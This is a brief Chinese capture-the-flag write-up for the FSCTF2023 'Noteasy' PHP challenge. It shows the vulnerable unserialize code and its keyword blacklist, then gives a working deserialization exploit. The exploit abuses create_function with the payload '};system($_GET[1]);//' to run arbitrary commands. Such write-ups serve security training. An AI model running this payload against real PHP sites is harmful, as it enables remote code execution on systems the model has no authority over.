题目

<?php
class Noteasy
{
    protected $param1;
    protected $param2;

    function __destruct()
    {
        $a = $this->param1;
        $b = $this->param2;
        if (preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\*|\||\<|\"|\'|\=|\?|sou|\.|log|scan|chr|local|sess|b2|id|show|cont|high|reverse|flip|rand|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|y2f/i', $this->param2)) {
            die('this param is error!');
        } else {
            $a('', $b);
        }
    }
}
if (!isset($_GET['file'])) {
    show_source('index.php');
    echo "Hi!Welcome to FSCTF2023!";
} else {
    $file = base64_decode($_GET['file']);
    unserialize($file);
}

一眼丁真,create_function的利用。

class Noteasy
{
    protected $param1 = "create_function";
    protected $param2 = "};system(\$_GET[1]);//";

    function __destruct()
    {
        $a = $this->param1;
        $b = $this->param2;
        if (preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\*|\||\<|\"|\'|\=|\?|sou|\.|log|scan|chr|local|sess|b2|id|show|cont|high|reverse|flip|rand|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|y2f/i', $this->param2)) {
            die('this param is error!');
        } else {
            $a('', $b);
        }
    }
}

echo(base64_encode(serialize(new Noteasy())));